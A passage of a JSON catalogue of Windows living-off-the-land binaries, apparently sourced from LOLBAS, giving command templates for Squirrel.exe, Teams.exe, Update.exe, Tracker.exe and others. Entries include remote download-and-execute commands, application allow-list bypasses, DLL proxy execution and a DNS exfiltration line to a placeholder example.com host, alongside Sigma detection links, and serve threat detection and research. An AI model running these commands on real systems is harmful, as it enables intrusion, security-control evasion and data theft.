binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:squirrel-exe:2","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"squirrel.exe --update {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:squirrel-exe:3","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"squirrel.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:squirrel-exe:4","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"squirrel.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:te-exe:0","toolId":"lolbas:te-exe","toolName":"te.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"te.exe {PATH:.wsc}","description":"Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.","usecase":"Execute Visual Basic script stored in local Windows Script Component file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"}],"references":["https://twitter.com/gn3mes1s/status/927680266390384640","https://github.com/LOLBAS-Project/LOLBAS/pull/359","https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests","https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:te-exe:1","toolId":"lolbas:te-exe","toolName":"te.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"te.exe {PATH:.dll}","description":"Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.","usecase":"Execute DLL file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"}],"references":["https://twitter.com/gn3mes1s/status/927680266390384640","https://github.com/LOLBAS-Project/LOLBAS/pull/359","https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests","https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:teams-exe:0","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe","description":"Generate JavaScript payload and package.json, and save to \"%LOCALAPPDATA%\\\\Microsoft\\\\Teams\\\\current\\\\app\\\\\" before executing.","usecase":"Execute JavaScript code","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:teams-exe:1","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe","description":"Generate JavaScript payload and package.json, archive in ASAR file and save to \"%LOCALAPPDATA%\\\\Microsoft\\\\Teams\\\\current\\\\app.asar\" before executing.","usecase":"Execute JavaScript code","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:teams-exe:2","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"Teams spawns cmd.exe as a child process of teams.exe and executes the ping command","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:testwindowremoteagent-exe:0","toolId":"lolbas:testwindowremoteagent-exe","toolName":"TestWindowRemoteAgent.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000","description":"Sends DNS query for open connection to any host, enabling exfiltration over DNS","usecase":"Attackers may utilize this to exfiltrate data over DNS","mitre":["T1048"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"TestWindowRemoteAgent.exe spawning unexpectedly"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/TestWindowRemoteAgent/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:tracker-exe:0","toolId":"lolbas:tracker-exe","toolName":"Tracker.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Tracker.exe /d {PATH:.dll} /c C:\\Windows\\write.exe","description":"Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.","usecase":"Injection of locally stored DLL file into target process.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml"}],"references":["https://twitter.com/subTee/status/793151392185589760","https://attack.mitre.org/wiki/Execution","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:tracker-exe:1","toolId":"lolbas:tracker-exe","toolName":"Tracker.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Tracker.exe /d {PATH:.dll} /c C:\\Windows\\write.exe","description":"Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.","usecase":"Injection of locally stored DLL file into target process.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml"}],"references":["https://twitter.com/subTee/status/793151392185589760","https://attack.mitre.org/wiki/Execution","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:0","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Update.exe --download {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file and download the nuget package.","usecase":"Download binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:1","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --update={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:2","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --update={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:3","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --update={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:4","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --update={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:5","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:6","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:7","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --processStart {PATH:.exe} --process-start-args \"{CMD:args}\"","description":"Copy your payload into %userprofile%\\AppData\\Local\\Microsoft\\Teams\\current\\. Then run the command. Update.exe will execute the file you copied.","usecase":"Application Whitelisting Bypass","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:8","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --updateRollback={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:9","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --updateRollback={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:update-exe:10","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --processStart {PATH:.exe} --process-start-args \"{CMD:args}\"","description":"Copy your payload into %userprofile%\\AppData\\Local\\Microsoft\\Teams\\current\\. Then run the command. Update.exe will execute the file you copied.","usecase":"Execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown 